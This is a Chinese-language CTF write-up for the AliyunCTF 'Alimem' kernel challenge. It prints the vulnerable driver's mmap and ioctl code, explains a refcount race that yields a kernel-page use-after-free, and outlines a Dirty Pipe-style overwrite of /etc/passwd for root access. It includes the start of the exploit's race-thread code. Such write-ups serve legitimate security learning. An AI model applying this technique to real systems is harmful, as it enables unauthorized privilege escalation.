<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="AliyunCTF–Alimem一. 背景介绍​	本题主要是通过实现了一个misc设备来实现一个简单的内存管理模块，支持增删查改以及mmap的回调函数，通过对于本题的学习了解如何注册一个Misc设备并且通过vma_area_struct实现虚拟内存的实现，最终利用多线程竞争的漏洞，实现对于内核页的uaf，利用splice函数将只读的&#x2F;etc&#x2F;passwd覆盖，实现提权的思路。">
<meta property="og:type" content="article">
<meta property="og:title" content="a2ure&#39;s blog">
<meta property="og:url" content="http://example.com/2026/02/07/AliyunCTF--Alimem/index.html">
<meta property="og:site_name" content="a2ure&#39;s blog">
<meta property="og:description" content="AliyunCTF–Alimem一. 背景介绍​	本题主要是通过实现了一个misc设备来实现一个简单的内存管理模块，支持增删查改以及mmap的回调函数，通过对于本题的学习了解如何注册一个Misc设备并且通过vma_area_struct实现虚拟内存的实现，最终利用多线程竞争的漏洞，实现对于内核页的uaf，利用splice函数将只读的&#x2F;etc&#x2F;passwd覆盖，实现提权的思路。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/alimem/1741167424394.jpg">
<meta property="og:image" content="http://example.com/images/alimem/1741173753507.jpg">
<meta property="og:image" content="http://example.com/images/alimem/1741173882219.jpg">
<meta property="og:image" content="http://example.com/images/alimem/1741173955066.jpg">
<meta property="article:published_time" content="2026-02-07T01:50:05.718Z">
<meta property="article:modified_time" content="2026-02-07T01:50:05.720Z">
<meta property="article:author" content="a2ure">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/alimem/1741167424394.jpg">

<link rel="canonical" href="http://example.com/2026/02/07/AliyunCTF--Alimem/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title> | a2ure's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">a2ure's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2026/02/07/AliyunCTF--Alimem/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="a2ure">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="a2ure's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2026-02-07 09:50:05" itemprop="dateCreated datePublished" datetime="2026-02-07T09:50:05+08:00">2026-02-07</time>
            </span>

          <br>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">Symbols count in article: </span>
              <span>3.6k</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">Reading time &asymp;</span>
              <span>13 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="AliyunCTF–Alimem"><a href="#AliyunCTF–Alimem" class="headerlink" title="AliyunCTF–Alimem"></a>AliyunCTF–Alimem</h1><h2 id="一-背景介绍"><a href="#一-背景介绍" class="headerlink" title="一. 背景介绍"></a>一. 背景介绍</h2><p>​	本题主要是通过实现了一个misc设备来实现一个简单的内存管理模块，支持增删查改以及mmap的回调函数，通过对于本题的学习了解如何注册一个Misc设备并且通过vma_area_struct实现虚拟内存的实现，最终利用多线程竞争的漏洞，实现对于内核页的uaf，利用splice函数将只读的&#x2F;etc&#x2F;passwd覆盖，实现提权的思路。</p>
<h3 id="1-1-splice函数"><a href="#1-1-splice函数" class="headerlink" title="1.1 splice函数"></a>1.1 splice函数</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> _GNU_SOURCE         <span class="comment">/* See feature_test_macros(7) */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">ssize_t</span> <span class="title function_">splice</span><span class="params">(<span class="type">int</span> fd_in, <span class="type">loff_t</span> *off_in, <span class="type">int</span> fd_out,</span></span><br><span class="line"><span class="params">               <span class="type">loff_t</span> *off_out, <span class="type">size_t</span> len, <span class="type">unsigned</span> <span class="type">int</span> flags)</span>;</span><br></pre></td></tr></table></figure>

<p>​	当我们想要将一个文件的数据拷贝到另一个文件时，比较朴素的一种想法是打开两个文件后将源文件数据读入后再写入目标文件，但这样的做法需要在用户空间与内核空间之间来回进行数据拷贝，具有可观的开销，因此为了减少这样的开销， splice这一个非常独特的系统调用应运而生，其作用是在文件与管道之间进行数据拷贝，以此将内核空间与用户空间之间的数据拷贝转变为内核空间内的数据拷贝，从而避免了数据在用户空间与内核空间之间的拷贝造成的开销。</p>
<p>​	因此如果我们存在一个UAF可以控制pipe_buffer结构体，可以清除flags字段的只读，就可以通过利用管道的读写，实现对于内核中只读的文件进行覆盖，这里的思路借鉴了CVE-2022-0847 dirty pipe的思想，利用这个办法可以避免传统覆盖pipe_buf_operations的方法，可以减少对于内核基地址的泄露，直接覆盖&#x2F;etc&#x2F;passwd实现提权思想。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">pipe_buffer</span> &#123;</span></span><br><span class="line">	<span class="class"><span class="keyword">struct</span> <span class="title">page</span> *<span class="title">page</span>;</span></span><br><span class="line">	<span class="type">unsigned</span> <span class="type">int</span> offset, len;</span><br><span class="line">	<span class="type">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">pipe_buf_operations</span> *<span class="title">ops</span>;</span></span><br><span class="line">	<span class="type">unsigned</span> <span class="type">int</span> flags;</span><br><span class="line">	<span class="type">unsigned</span> <span class="type">long</span> private;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<h3 id="1-2-struct-page结构体"><a href="#1-2-struct-page结构体" class="headerlink" title="1.2 struct page结构体"></a>1.2 struct page结构体</h3><ul>
<li>virt_to_page() 返回与虚拟地址关联的页面</li>
<li>pfn_to_page() 返回与页面帧号关联的页面</li>
<li>page_to_pfn() 返回与 struct page 关联的页面帧号</li>
<li>page_address() 返回 struct page 的虚拟地址；此函数只能用于 lowmem 中的页面</li>
<li>kmap() 为任意物理页面（可以来自 highmem）在内核中创建映射，并返回虚拟地址，该虚拟地址可用于直接引用该页面</li>
</ul>
<h3 id="1-3-vm-area-struct结构体"><a href="#1-3-vm-area-struct结构体" class="headerlink" title="1.3 vm_area_struct结构体"></a>1.3 vm_area_struct结构体</h3><p>​	它表示的是一块连续的虚拟地址空间区域，给进程使用的，地址空间范围是0~3G，对应的物理页面都可以是不连续的。</p>
<p><img src="/images/alimem/1741167424394.jpg" alt="1741167424394"></p>
<ul>
<li><p>vm_start 以及 vm_end ——内存区域的起始和结束地址（这些字段也出现在 &#x2F;proc&#x2F;<pid>&#x2F;maps 中）；</p>
</li>
<li><p>vm_file ——关联 file 结构的指针（如果有的话）；</p>
</li>
<li><p>vm_pgoff ——区域在文件中的偏移量；</p>
</li>
<li><p>vm_flags ——一组标志；</p>
</li>
<li><p>vm_ops ——该区域的工作函数集合；</p>
</li>
<li><p>vm_next 以及 vm_prev ——同一进程的区域通过链表结构连接起来。</p>
<p>对于驱动实现mmap回调函数来说，主要的作用就是讲设备的物理地址和要分配的虚拟地址进行映射，也就就是利用remap_pfn_range() 将连续的物理地址空间映射到由 vm_area_struct 表示的虚拟空间</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">remap_pfn_range</span><span class="params">(<span class="keyword">struct</span> vm_area_struct *vma, <span class="type">unsigned</span> <span class="type">long</span> addr,</span></span><br><span class="line"><span class="params">                    <span class="type">unsigned</span> <span class="type">long</span> pfn, <span class="type">unsigned</span> <span class="type">long</span> size, <span class="type">pgprot_t</span> prot)</span>;</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="二-漏洞产生原因"><a href="#二-漏洞产生原因" class="headerlink" title="二. 漏洞产生原因"></a>二. 漏洞产生原因</h2><h3 id="2-1-alimem-mmap函数"><a href="#2-1-alimem-mmap函数" class="headerlink" title="2.1 alimem_mmap函数"></a>2.1 alimem_mmap函数</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">int</span> <span class="title function_">alimem_mmap</span><span class="params">(<span class="keyword">struct</span> file *filp, <span class="keyword">struct</span> vm_area_struct *vma)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">int</span> idx = vma-&gt;vm_pgoff;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">alimem_page</span> *<span class="title">page</span>;</span></span><br><span class="line">    <span class="type">int</span> ret = -EINVAL;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (idx &lt; <span class="number">0</span> || idx &gt;= MAX_PAGES) <span class="keyword">return</span> -EINVAL;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (vma-&gt;vm_end - vma-&gt;vm_start != PAGE_SIZE) &#123;</span><br><span class="line">        <span class="keyword">return</span> -EINVAL;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    rcu_read_lock();</span><br><span class="line">    <span class="keyword">if</span>(!pages[idx]) &#123;</span><br><span class="line">        rcu_read_unlock();</span><br><span class="line">        <span class="keyword">return</span> -EINVAL;</span><br><span class="line">    &#125;</span><br><span class="line">    page = rcu_dereference(pages[idx]);</span><br><span class="line">    <span class="keyword">if</span> (page) &#123;</span><br><span class="line">        <span class="type">phys_addr_t</span> phys = page-&gt;phys;</span><br><span class="line">        vma-&gt;vm_ops = &amp;alimem_vm_ops;</span><br><span class="line">        vma-&gt;vm_private_data = page;</span><br><span class="line">        vm_flags_set(vma, vma-&gt;vm_flags | VM_DONTEXPAND | VM_DONTDUMP);</span><br><span class="line">        rcu_read_unlock();</span><br><span class="line">        <span class="keyword">if</span> (remap_pfn_range(vma, vma-&gt;vm_start, </span><br><span class="line">                          phys &gt;&gt; PAGE_SHIFT,</span><br><span class="line">                          vma-&gt;vm_end - vma-&gt;vm_start,</span><br><span class="line">                          vma-&gt;vm_page_prot)) &#123;</span><br><span class="line">            <span class="keyword">return</span> -EAGAIN;</span><br><span class="line">        &#125;</span><br><span class="line">        </span><br><span class="line">        <span class="type">atomic_inc</span>(&amp;page-&gt;refcount);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    rcu_read_unlock();</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	该 alimem_mmap 函数是 Linux 设备驱动中实现内存映射的核心机制，其通过参数校验（检查用户指定的内存页索引是否合法及映射长度是否符合单页要求）、RCU 保护下的内存页查找（确保访问全局数组时的线程安全）、虚拟内存区域配置（设置自定义的 vm_ops 操作集并将 alimem_page 关联到 vm_private_data 以提供操作上下文）、物理内存映射（利用 remap_pfn_range 将内核物理页转换为用户虚拟地址）以及引用计数管理（通过原子操作确保内存页生命周期安全），构建了用户空间直接访问内核物理内存的通道。这种设计实现了<strong>零拷贝</strong>机制，用户程序可通过指针直接操作设备内存，避免了传统 read&#x2F;write 系统调用在用户态与内核态间的数据复制开销。</p>
<p>​	但是在设计中存在一个漏洞首先线通过rcu_dereference获得到了page的一个引用，之后在对其进行处理操作之后对于refcount进行增加。这就给到了多线程竞争的时间。</p>
<h3 id="2-2-ioctl函数"><a href="#2-2-ioctl函数" class="headerlink" title="2.2 ioctl函数"></a>2.2 ioctl函数</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">long</span> <span class="title function_">alimem_ioctl</span><span class="params">(<span class="keyword">struct</span> file *filp, <span class="type">unsigned</span> <span class="type">int</span> cmd, <span class="type">unsigned</span> <span class="type">long</span> arg)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">int</span> idx, ret = <span class="number">0</span>;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">alimem_page</span> *<span class="title">new_page</span>;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">switch</span> (cmd) &#123;</span><br><span class="line">    <span class="keyword">case</span> ALIMEM_ALLOC: &#123;</span><br><span class="line">        new_page = kzalloc(<span class="keyword">sizeof</span>(*new_page), GFP_KERNEL);</span><br><span class="line">        <span class="keyword">if</span> (!new_page) <span class="keyword">return</span> -ENOMEM;</span><br><span class="line">    </span><br><span class="line">        new_page-&gt;virt = (<span class="type">void</span> *)__get_free_pages(GFP_KERNEL, PAGE_ORDER);</span><br><span class="line">        <span class="keyword">if</span> (!new_page-&gt;virt) &#123;</span><br><span class="line">            kfree(new_page);</span><br><span class="line">            <span class="keyword">return</span> -ENOMEM;</span><br><span class="line">        &#125;</span><br><span class="line">    </span><br><span class="line">        new_page-&gt;phys = virt_to_phys(new_page-&gt;virt);</span><br><span class="line">        <span class="type">atomic_set</span>(&amp;new_page-&gt;refcount, <span class="number">1</span>);</span><br><span class="line">    </span><br><span class="line">        down_write(&amp;pages_lock);</span><br><span class="line">        <span class="keyword">for</span> (idx = <span class="number">0</span>; idx &lt; MAX_PAGES; idx++) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!pages[idx]) &#123;</span><br><span class="line">                rcu_assign_pointer(pages[idx], new_page);</span><br><span class="line">                up_write(&amp;pages_lock);</span><br><span class="line">                <span class="keyword">return</span> idx;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        up_write(&amp;pages_lock);</span><br><span class="line">        free_pages((<span class="type">unsigned</span> <span class="type">long</span>)new_page-&gt;virt, PAGE_ORDER);</span><br><span class="line">        kfree(new_page);</span><br><span class="line">        <span class="keyword">return</span> -ENOSPC;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">case</span> ALIMEM_FREE: &#123;</span><br><span class="line">        <span class="class"><span class="keyword">struct</span> <span class="title">alimem_page</span> *<span class="title">old</span>;</span></span><br><span class="line">    </span><br><span class="line">        <span class="keyword">if</span> (get_user(idx, (<span class="type">int</span> __user *)arg)) <span class="keyword">return</span> -EFAULT;</span><br><span class="line">        <span class="keyword">if</span> (idx &lt; <span class="number">0</span> || idx &gt;= MAX_PAGES) <span class="keyword">return</span> -EINVAL;</span><br><span class="line">    </span><br><span class="line">        down_write(&amp;pages_lock);</span><br><span class="line">        old = pages[idx];</span><br><span class="line">        <span class="keyword">if</span> (old) &#123;</span><br><span class="line">            rcu_assign_pointer(pages[idx], <span class="literal">NULL</span>);</span><br><span class="line">            <span class="keyword">if</span> (atomic_dec_and_test(&amp;old-&gt;refcount)) &#123;</span><br><span class="line">                <span class="built_in">memset</span>(old-&gt;virt, <span class="number">0</span>, PAGE_SIZE);</span><br><span class="line">                call_rcu(&amp;old-&gt;rcu, free_page_rcu);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        up_write(&amp;pages_lock);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">case</span> ALIMEM_WRITE: &#123;</span><br><span class="line">        <span class="class"><span class="keyword">struct</span> <span class="title">alimem_write</span> <span class="title">wr</span>;</span></span><br><span class="line">        <span class="class"><span class="keyword">struct</span> <span class="title">alimem_page</span> *<span class="title">page</span>;</span></span><br><span class="line">    </span><br><span class="line">        <span class="keyword">if</span> (copy_from_user(&amp;wr, (<span class="type">void</span> __user *)arg, <span class="keyword">sizeof</span>(wr)))</span><br><span class="line">            <span class="keyword">return</span> -EFAULT;</span><br><span class="line">    </span><br><span class="line">        <span class="keyword">if</span> (wr.idx &lt; <span class="number">0</span> || wr.idx &gt;= MAX_PAGES || </span><br><span class="line">            wr.offset + wr.size &gt; PAGE_SIZE)</span><br><span class="line">            <span class="keyword">return</span> -EINVAL;</span><br><span class="line">    </span><br><span class="line">        rcu_read_lock();</span><br><span class="line">        page = rcu_dereference(pages[wr.idx]);</span><br><span class="line">        <span class="keyword">if</span> (!page) &#123;</span><br><span class="line">            rcu_read_unlock();</span><br><span class="line">            <span class="keyword">return</span> -EFAULT;</span><br><span class="line">        &#125;</span><br><span class="line">    </span><br><span class="line">        <span class="keyword">if</span> (copy_from_user(page-&gt;virt + wr.offset, wr.data, wr.size)) &#123;</span><br><span class="line">            rcu_read_unlock();</span><br><span class="line">            <span class="keyword">return</span> -EFAULT;</span><br><span class="line">        &#125;</span><br><span class="line">        rcu_read_unlock();</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">case</span> ALIMEM_READ: &#123;</span><br><span class="line">        <span class="class"><span class="keyword">struct</span> <span class="title">alimem_read</span> <span class="title">rd</span>;</span></span><br><span class="line">        <span class="class"><span class="keyword">struct</span> <span class="title">alimem_page</span> *<span class="title">page</span>;</span></span><br><span class="line">    </span><br><span class="line">        <span class="keyword">if</span> (copy_from_user(&amp;rd, (<span class="type">void</span> __user *)arg, <span class="keyword">sizeof</span>(rd)))</span><br><span class="line">            <span class="keyword">return</span> -EFAULT;</span><br><span class="line">    </span><br><span class="line">        <span class="keyword">if</span> (rd.idx &lt; <span class="number">0</span> || rd.idx &gt;= MAX_PAGES || </span><br><span class="line">            rd.offset + rd.size &gt; PAGE_SIZE)</span><br><span class="line">            <span class="keyword">return</span> -EINVAL;</span><br><span class="line">    </span><br><span class="line">        rcu_read_lock();</span><br><span class="line">        page = rcu_dereference(pages[rd.idx]);</span><br><span class="line">        <span class="keyword">if</span> (!page) &#123;</span><br><span class="line">            rcu_read_unlock();</span><br><span class="line">            <span class="keyword">return</span> -EFAULT;</span><br><span class="line">        &#125;</span><br><span class="line">    </span><br><span class="line">        <span class="keyword">if</span> (copy_to_user(rd.data, page-&gt;virt + rd.offset, rd.size)) &#123;</span><br><span class="line">            rcu_read_unlock();</span><br><span class="line">            <span class="keyword">return</span> -EFAULT;</span><br><span class="line">        &#125;</span><br><span class="line">        rcu_read_unlock();</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">        <span class="keyword">return</span> -ENOTTY;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	该 alimem_ioctl 函数通过处理 ALIMEM_ALLOC、ALIMEM_FREE、ALIMEM_WRITE 和 ALIMEM_READ 四个控制命令，实现了对内核物理内存页的动态分配、释放及用户态数据的读写操作：在分配时，通过 __get_free_pages 申请物理内存页并记录其虚拟与物理地址，利用自旋锁保护全局页表 pages 的更新，确保线程安全地插入空闲索引位；释放时通过原子引用计数和 RCU 机制延迟回收内存，避免并发访问冲突；读写操作则在验证索引与偏移合法性后，直接通过 copy_from_user 和 copy_to_user 在内核页与用户缓冲区之间传输数据，绕过传统文件读写的数据复制开销。整个过程通过 pages_lock 写锁与 RCU 读锁的协同，保障多线程环境下页表访问的原子性与一致性，同时借助引用计数和内存清零（memset）确保资源安全释放，最终实现用户态程序对设备内存的高效零拷贝访问。</p>
<p>​	但是漏洞主要发生的问题在于在free的时候由于没有加入rcu的读锁，导致我们可以在多线程竞争的情况下不断地free，如果在mmap获取引用和自增refcount之间的这段时间里面free掉了这个页面，那么我们就可以成功的mmap到之前free的一个页面，之后再利用pipe_buffer的分配就可以实现漏洞的利用了。</p>
<h2 id="三-漏洞利用"><a href="#三-漏洞利用" class="headerlink" title="三.漏洞利用"></a>三.漏洞利用</h2><h3 id="3-1-uaf构造"><a href="#3-1-uaf构造" class="headerlink" title="3.1 uaf构造"></a>3.1 uaf构造</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">check_zero</span><span class="params">(<span class="type">void</span> *addr)</span> &#123;</span><br><span class="line">    <span class="type">char</span> *p = (<span class="type">char</span>*)addr;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; PAGE_SIZE; i++) &#123;</span><br><span class="line">        <span class="keyword">if</span> (p[i] != <span class="number">0</span>) <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">atomic_store</span>(&amp;uaf_detected, <span class="number">1</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span>* <span class="title function_">mapper_thread</span><span class="params">(<span class="type">void</span> *arg)</span> &#123;</span><br><span class="line">    <span class="type">int</span> idx = *(<span class="type">int</span>*)arg;</span><br><span class="line">    addr = mmap(<span class="literal">NULL</span>, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, idx * PAGE_SIZE);</span><br><span class="line">    usleep(<span class="number">500</span>);</span><br><span class="line">    <span class="keyword">if</span> (addr != MAP_FAILED) &#123;</span><br><span class="line">        usleep(<span class="number">50000</span>);</span><br><span class="line">        check_zero(addr);</span><br><span class="line">        <span class="keyword">if</span>(!uaf_detected)</span><br><span class="line">            munmap(addr, PAGE_SIZE);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	首先讲一下check_zero函数和mapper_thread函数，这两个函数主要是对于上述所说的多线程竞争的主要实现，首先通过传入的id，来利用mmap函数分配虚拟设备中的内存，之后sleep一段时间，这段时间位于后面的usleep(50)多一些，使得后面可以不断的free，尝试再mmap获取到引用之后进行free。</p>
